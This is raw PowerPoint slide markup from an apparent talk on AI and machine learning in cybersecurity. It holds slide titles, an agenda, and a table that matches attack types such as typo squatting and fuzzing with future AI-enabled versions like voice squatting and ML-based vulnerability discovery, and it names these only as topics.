                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1050" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cybersecurity</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="58120" marR="58120" marT="29060" marB="29060">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1050" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>AI enabled threat of the future</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="58120" marR="58120" marT="29060" marB="29060">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="369102611"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="414813">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1050" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Typo squatting, phono squatting</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="58120" marR="58120" marT="29060" marB="29060"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1050" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Voice squatting and voice masquerading</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="58120" marR="58120" marT="29060" marB="29060"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3403907935"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="668878">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1050" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Penetration testing &amp; Fuzzing applications for fun and profit</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="58120" marR="58120" marT="29060" marB="29060"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1050" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Reinforcement learning based fuzzing and machine learning based vulnerability discovery</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="58120" marR="58120" marT="29060" marB="29060"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2729638908"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="715978">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1050" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Feature based attacks on the new battleground i.e. the endpoint</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="58120" marR="58120" marT="29060" marB="29060"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1050" dirty="0">
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Using rich machine learning features on the endpoint</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="58120" marR="58120" marT="29060" marB="29060"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3029200277"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10669379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23" name="TextBox 22"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148533" y="959195"/>
            <a:ext cx="2895600" cy="345743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB081A3-E877-4B09-AD28-7E86062D9C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:grayscl/>
          </a:blip>
          <a:srcRect l="32398" r="5484"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2324" y="1486184"/>
            <a:ext cx="4449127" cy="5371816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{938160AE-416C-4A16-BAD4-75D212BF82D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="51000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7301" y="1481064"/>
            <a:ext cx="4428761" cy="5371816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247489" y="5654534"/>
            <a:ext cx="4004110" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" charset="0"/>
                <a:ea typeface="Montserrat" charset="0"/>
                <a:cs typeface="Montserrat" charset="0"/>
              </a:rPr>
              <a:t>AI seems to be the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" charset="0"/>
                <a:ea typeface="Montserrat" charset="0"/>
                <a:cs typeface="Montserrat" charset="0"/>
              </a:rPr>
              <a:t>encompassing marketing term</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="336885" y="1679669"/>
            <a:ext cx="4004110" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>AI &amp; ML ARE THE SAME YET DIFFERENT?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB7D86C-5F7A-4642-849E-E54FEEDCB6CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="50201" b="18547"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4436061" y="1486184"/>
            <a:ext cx="7748637" cy="5376936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Oval 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CAB67D4-627D-4425-AC99-C7E3105A6666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="1975891"/>
            <a:ext cx="4654464" cy="4560604"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:sysClr val="windowText" lastClr="000000">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:sysClr>
              </a:gs>
              <a:gs pos="100000">
                <a:sysClr val="window" lastClr="FFFFFF">
                  <a:lumMod val="85000"/>
                </a:sysClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="0"/>
          </a:gra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457166"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41" name="Oval 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56DDE1B7-CEF0-421C-9AE4-419632082D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6550512" y="3134384"/>
            <a:ext cx="3298140" cy="3231631"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="C0504D">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="C0504D">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="0"/>
          </a:gra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457166"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42" name="Oval 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7584C4DA-E4D0-47E0-AC69-F83A5A9D1592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7141987" y="4168719"/>
            <a:ext cx="2103596" cy="2074079"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="C00000"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="C0504D">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="0"/>
          </a:gra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457166"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43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD5E99C6-DE18-4BD5-A574-0180E41569E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7586933" y="2563801"/>
            <a:ext cx="2103596" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457166"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Artificial Intelligence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E6BCCC0-419C-4472-B0B1-FEB90C379C3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7442671" y="3596041"/>
            <a:ext cx="2103596" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457166"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Machine Learning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="TextBox 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD0BC79-0F1B-43E4-98AE-ED253EC6403D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7442671" y="5049786"/>
            <a:ext cx="2103596" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457166"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deep Learning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5876183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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a: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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="209692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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C1CF53-01B8-4905-AF28-A99B592730C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="41169" r="1126" b="18058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2323" y="1486183"/>
            <a:ext cx="12194324" cy="8682415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776DEC76-6444-477A-9D7D-7ADB1691B8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622168" y="2045157"/>
            <a:ext cx="3959663" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TYPO SQUATTING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042E1155-793D-422C-889E-AF5B33DFAF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="56000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429500" y="1486184"/>
            <a:ext cx="4762501" cy="5811866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38EAD553-8E14-4677-9AC7-48B3DA948CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="333983" y="2957750"/>
            <a:ext cx="1224308" cy="594563"/>
            <a:chOff x="722112" y="155341"/>
            <a:chExt cx="1038543" cy="504349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Oval 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C013CE7B-A632-4334-8808-16D6C8725B9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
